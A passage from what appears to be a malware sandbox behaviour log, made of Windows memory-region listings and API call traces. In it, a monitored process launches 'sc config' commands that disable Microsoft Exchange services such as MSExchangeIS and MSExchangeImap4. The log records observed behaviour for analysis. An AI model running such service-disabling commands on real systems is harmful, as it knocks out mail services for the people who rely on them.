00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7380 start_va = 0xd20000 end_va = 0xd3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 7381 start_va = 0xd40000 end_va = 0xd41fff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 7382 start_va = 0xd50000 end_va = 0xd63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d50000" filename = "" Region: id = 7383 start_va = 0xd70000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 7384 start_va = 0xdb0000 end_va = 0xdeffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 7385 start_va = 0xdf0000 end_va = 0xdf3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000df0000" filename = "" Region: id = 7386 start_va = 0xe00000 end_va = 0xe00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 7387 start_va = 0xe10000 end_va = 0xe11fff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 7388 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 7389 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 7390 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7391 start_va = 0x7f680000 end_va = 0x7f6a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f680000" filename = "" Region: id = 7392 start_va = 0x7f6a5000 end_va = 0x7f6a5fff entry_point = 0x0 region_type = private name = "private_0x000000007f6a5000" filename = "" Region: id = 7393 start_va = 0x7f6ac000 end_va = 0x7f6aefff entry_point = 0x0 region_type = private name = "private_0x000000007f6ac000" filename = "" Region: id = 7394 start_va = 0x7f6af000 end_va = 0x7f6affff entry_point = 0x0 region_type = private name = "private_0x000000007f6af000" filename = "" Region: id = 7395 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7396 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7397 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7398 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7399 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7400 start_va = 0x4ff0000 end_va = 0x4ffffff entry_point = 0x0 region_type = private name = "private_0x0000000004ff0000" filename = "" Region: id = 7401 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7402 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7403 start_va = 0x4ed0000 end_va = 0x4fcffff entry_point = 0x0 region_type = private name = "private_0x0000000004ed0000" filename = "" Region: id = 7404 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7405 start_va = 0xd20000 end_va = 0xd2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 7406 start_va = 0xd30000 end_va = 0xd33fff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 7407 start_va = 0xe20000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 7408 start_va = 0x5000000 end_va = 0x50bdfff entry_point = 0x5000000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7409 start_va = 0x50c0000 end_va = 0x50fffff entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 7410 start_va = 0x52c0000 end_va = 0x52cffff entry_point = 0x0 region_type = private name = "private_0x00000000052c0000" filename = "" Region: id = 7411 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7412 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7413 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7414 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7415 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7416 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7417 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7418 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7419 start_va = 0x7f580000 end_va = 0x7f67ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f580000" filename = "" Region: id = 7420 start_va = 0x7f6a9000 end_va = 0x7f6abfff entry_point = 0x0 region_type = private name = "private_0x000000007f6a9000" filename = "" Region: id = 7421 start_va = 0x5100000 end_va = 0x51defff entry_point = 0x5100000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 7422 start_va = 0xe60000 end_va = 0xe71fff entry_point = 0xe60000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 465 os_tid = 0x824 [0130.538] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0130.538] __set_app_type (_Type=0x1) [0130.538] __p__fmode () returned 0x77ac4d6c [0130.538] __p__commode () returned 0x77ac5b1c [0130.538] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0130.538] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0130.538] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.540] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.540] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0130.540] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0130.540] _wcsicmp (_String1="config", _String2="query") returned -14 [0130.540] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0130.540] _wcsicmp (_String1="config", _String2="start") returned -16 [0130.540] _wcsicmp (_String1="config", _String2="pause") returned -13 [0130.540] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0130.540] _wcsicmp (_String1="config", _String2="control") returned -14 [0130.540] _wcsicmp (_String1="config", _String2="continue") returned -14 [0130.540] _wcsicmp (_String1="config", _String2="stop") returned -16 [0130.540] _wcsicmp (_String1="config", _String2="config") returned 0 [0130.540] ResolveDelayLoadedAPI () returned 0x77262c10 [0130.541] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x4ed8cd8 [0130.543] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0130.543] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0130.543] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0130.543] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0130.543] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0130.543] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0130.543] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0130.543] OpenServiceW (hSCManager=0x4ed8cd8, lpServiceName="MSExchangeImap4", dwDesiredAccess=0x3) returned 0x0 [0130.543] GetLastError () returned 0x424 [0130.543] _ultow (in: _Dest=0x424, _Radix=14612436 | out: _Dest=0x424) returned="1060" [0130.543] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0130.544] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xdef7b0, nSize=0x2, Arguments=0xdef7c8 | out: lpBuffer="鐨ӭÞ蔔è") returned 0x62 [0130.545] GetFileType (hFile=0x3c) returned 0x2 [0130.545] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdef794 | out: lpMode=0xdef794) returned 1 [0130.545] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x4ed9428*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xdef7a4, lpReserved=0x0 | out: lpBuffer=0x4ed9428*, lpNumberOfCharsWritten=0xdef7a4*=0x62) returned 1 [0130.545] LocalFree (hMem=0x4ed9428) returned 0x0 [0130.545] LocalFree (hMem=0x0) returned 0x0 [0130.545] CloseServiceHandle (hSCObject=0x4ed8cd8) returned 1 [0130.546] LocalFree (hMem=0x0) returned 0x0 [0130.546] exit (_Code=1060) Thread: id = 466 os_tid = 0xbfc Process: id = "134" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xd251000" os_pid = "0x960" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeIS start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7423 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 7424 start_va = 0xb10000 end_va = 0x4b0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 7425 start_va = 0x4b10000 end_va = 0x4b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 7426 start_va = 0x4b30000 end_va = 0x4b30fff entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 7427 start_va = 0x4b40000 end_va = 0x4b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b40000" filename = "" Region: id = 7428 start_va = 0x4b60000 end_va = 0x4b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 7429 start_va = 0x4ba0000 end_va = 0x4c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004ba0000" filename = "" Region: id = 7430 start_va = 0x4ca0000 end_va = 0x4ca3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004ca0000" filename = "" Region: id = 7431 start_va = 0x4cb0000 end_va = 0x4cb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cb0000" filename = "" Region: id = 7432 start_va = 0x4cc0000 end_va = 0x4cc1fff entry_point = 0x0 region_type = private name = "private_0x0000000004cc0000" filename = "" Region: id = 7433 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7434 start_va = 0x7ef80000 end_va = 0x7efa2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ef80000" filename = "" Region: id = 7435 start_va = 0x7efa6000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa6000" filename = "" Region: id = 7436 start_va = 0x7efac000 end_va = 0x7efaefff entry_point = 0x0 region_type = private name = "private_0x000000007efac000" filename = "" Region: id = 7437 start_va = 0x7efaf000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efaf000" filename = "" Region: id = 7438 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7439 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7440 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7441 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7442 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7443 start_va = 0x4ce0000 end_va = 0x4ceffff entry_point = 0x0 region_type = private name = "private_0x0000000004ce0000" filename = "" Region: id = 7444 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7445 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7446 start_va = 0x4e70000 end_va = 0x4f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 7447 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7488 start_va = 0x4b10000 end_va = 0x4b1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b10000" filename = "" Region: id = 7489 start_va = 0x4cf0000 end_va = 0x4dadfff entry_point = 0x4cf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7490 start_va = 0x4db0000 end_va = 0x4deffff entry_point = 0x0 region_type = private name = "private_0x0000000004db0000" filename = "" Region: id = 7491 start_va = 0x4f70000 end_va = 0x506ffff entry_point = 0x0 region_type = private name = "private_0x0000000004f70000" filename = "" Region: id = 7492 start_va = 0x5260000 end_va = 0x526ffff entry_point = 0x0 region_type = private name = "private_0x0000000005260000" filename = "" Region: id = 7493 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7494 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7495 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7496 start_va = 0x7ee80000 end_va = 0x7ef7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee80000" filename = "" Region: id = 7497 start_va = 0x7efa9000 end_va = 0x7efabfff entry_point = 0x0 region_type = private name = "private_0x000000007efa9000" filename = "" Region: id = 7498 start_va = 0x4b20000 end_va = 0x4b23fff entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 7499 start_va = 0x4b30000 end_va = 0x4b33fff entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 7500 start_va = 0x5270000 end_va = 0x55a6fff entry_point = 0x5270000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 467 os_tid = 0x674 [0130.706] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0130.706] __set_app_type (_Type=0x1) [0130.706] __p__fmode () returned 0x77ac4d6c [0130.706] __p__commode () returned 0x77ac5b1c [0130.706] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0130.706] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0130.706] GetCurrentThreadId () returned 0x674 [0130.706] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x674) returned 0x84 [0130.706] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0130.706] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0130.706] SetThreadUILanguage (LangId=0x0) returned 0x409 [0130.709] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.709] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c9fe4c | out: phkResult=0x4c9fe4c*=0x0) returned 0x2 [0130.709] VirtualQuery (in: lpAddress=0x4c9fe53, lpBuffer=0x4c9fe04, dwLength=0x1c | out: lpBuffer=0x4c9fe04*(BaseAddress=0x4c9f000, AllocationBase=0x4ba0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.709] VirtualQuery (in: lpAddress=0x4ba0000, lpBuffer=0x4c9fe04, dwLength=0x1c | out: lpBuffer=0x4c9fe04*(BaseAddress=0x4ba0000, AllocationBase=0x4ba0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0130.709] VirtualQuery (in: lpAddress=0x4ba1000, lpBuffer=0x4c9fe04, dwLength=0x1c | out: lpBuffer=0x4c9fe04*(BaseAddress=0x4ba1000, AllocationBase=0x4ba0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0130.709] VirtualQuery (in: lpAddress=0x4ba3000, lpBuffer=0x4c9fe04, dwLength=0x1c | out: lpBuffer=0x4c9fe04*(BaseAddress=0x4ba3000, AllocationBase=0x4ba0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0130.709] VirtualQuery (in: lpAddress=0x4ca0000, lpBuffer=0x4c9fe04, dwLength=0x1c | out: lpBuffer=0x4c9fe04*(BaseAddress=0x4ca0000, AllocationBase=0x4ca0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0130.709] GetConsoleOutputCP () returned 0x1b5 [0130.709] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0130.709] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0130.709] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.709] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0130.709] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.709] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0130.710] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.710] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0130.710] _get_osfhandle (_FileHandle=0) returned 0x38 [0130.710] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0130.710] _get_osfhandle (_FileHandle=0) returned 0x38 [0130.710] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0130.710] GetEnvironmentStringsW () returned 0x4e77d90* [0130.710] FreeEnvironmentStringsA (penv="A") returned 1 [0130.710] GetEnvironmentStringsW () returned 0x4e77d90* [0130.711] FreeEnvironmentStringsA (penv="A") returned 1 [0130.711] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4c9edb0 | out: phkResult=0x4c9edb0*=0x94) returned 0x0 [0130.711] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4c9edb4, lpData=0x4c9edbc, lpcbData=0x4c9edb8*=0x1000 | out: lpType=0x4c9edb4*=0x0, lpData=0x4c9edbc*=0xf8, lpcbData=0x4c9edb8*=0x1000) returned 0x2 [0130.711] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4c9edb4, lpData=0x4c9edbc, lpcbData=0x4c9edb8*=0x1000 | out: lpType=0x4c9edb4*=0x4, lpData=0x4c9edbc*=0x1, lpcbData=0x4c9edb8*=0x4) returned 0x0 [0130.711] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4c9edb4, lpData=0x4c9edbc, lpcbData=0x4c9edb8*=0x1000 | out: lpType=0x4c9edb4*=0x0, lpData=0x4c9edbc*=0x1, lpcbData=0x4c9edb8*=0x1000) returned 0x2 [0130.711] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4c9edb4, lpData=0x4c9edbc, lpcbData=0x4c9edb8*=0x1000 | out: lpType=0x4c9edb4*=0x4, lpData=0x4c9edbc*=0x0, lpcbData=0x4c9edb8*=0x4) returned 0x0 [0130.711] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4c9edb4, lpData=0x4c9edbc, lpcbData=0x4c9edb8*=0x1000 | out: lpType=0x4c9edb4*=0x4, lpData=0x4c9edbc*=0x40, lpcbData=0x4c9edb8*=0x4) returned 0x0 [0130.711] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4c9edb4, lpData=0x4c9edbc, lpcbData=0x4c9edb8*=0x1000 | out: lpType=0x4c9edb4*=0x4, lpData=0x4c9edbc*=0x40, lpcbData=0x4c9edb8*=0x4) returned 0x0 [0130.711] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4c9edb4, lpData=0x4c9edbc, lpcbData=0x4c9edb8*=0x1000 | out: lpType=0x4c9edb4*=0x0, lpData=0x4c9edbc*=0x40, lpcbData=0x4c9edb8*=0x1000) returned 0x2 [0130.711] RegCloseKey (hKey=0x94) returned 0x0 [0130.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4c9edb0 | out: phkResult=0x4c9edb0*=0x94) returned 0x0 [0130.711] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4c9edb4, lpData=0x4c9edbc, lpcbData=0x4c9edb8*=0x1000 | out: lpType=0x4c9edb4*=0x0, lpData=0x4c9edbc*=0x40, lpcbData=0x4c9edb8*=0x1000) returned 0x2 [0130.711] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4c9edb4, lpData=0x4c9edbc, lpcbData=0x4c9edb8*=0x1000 | out: lpType=0x4c9edb4*=0x4, lpData=0x4c9edbc*=0x1, lpcbData=0x4c9edb8*=0x4) returned 0x0 [0130.711] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4c9edb4, lpData=0x4c9edbc, lpcbData=0x4c9edb8*=0x1000 | out: lpType=0x4c9edb4*=0x0, lpData=0x4c9edbc*=0x1, lpcbData=0x4c9edb8*=0x1000) returned 0x2 [0130.711] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4c9edb4, lpData=0x4c9edbc, lpcbData=0x4c9edb8*=0x1000 | out: lpType=0x4c9edb4*=0x4, lpData=0x4c9edbc*=0x0, lpcbData=0x4c9edb8*=0x4) returned 0x0 [0130.711] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4c9edb4, lpData=0x4c9edbc, lpcbData=0x4c9edb8*=0x1000 | out: lpType=0x4c9edb4*=0x4, lpData=0x4c9edbc*=0x9, lpcbData=0x4c9edb8*=0x4) returned 0x0 [0130.711] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4c9edb4, lpData=0x4c9edbc, lpcbData=0x4c9edb8*=0x1000 | out: lpType=0x4c9edb4*=0x4, lpData=0x4c9edbc*=0x9, lpcbData=0x4c9edb8*=0x4) returned 0x0 [0130.711] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4c9edb4, lpData=0x4c9edbc, lpcbData=0x4c9edb8*=0x1000 | out: lpType=0x4c9edb4*=0x0, lpData=0x4c9edbc*=0x9, lpcbData=0x4c9edb8*=0x1000) returned 0x2 [0130.711] RegCloseKey (hKey=0x94) returned 0x0 [0130.711] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29833 [0130.711] srand (_Seed=0x5ad29833) [0130.711] GetCommandLineW () returned="/c sc config MSExchangeIS start= disabled" [0130.711] GetCommandLineW () returned="/c sc config MSExchangeIS start= disabled" [0130.711] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0130.711] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4e79ce8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0130.712] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0130.712] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: 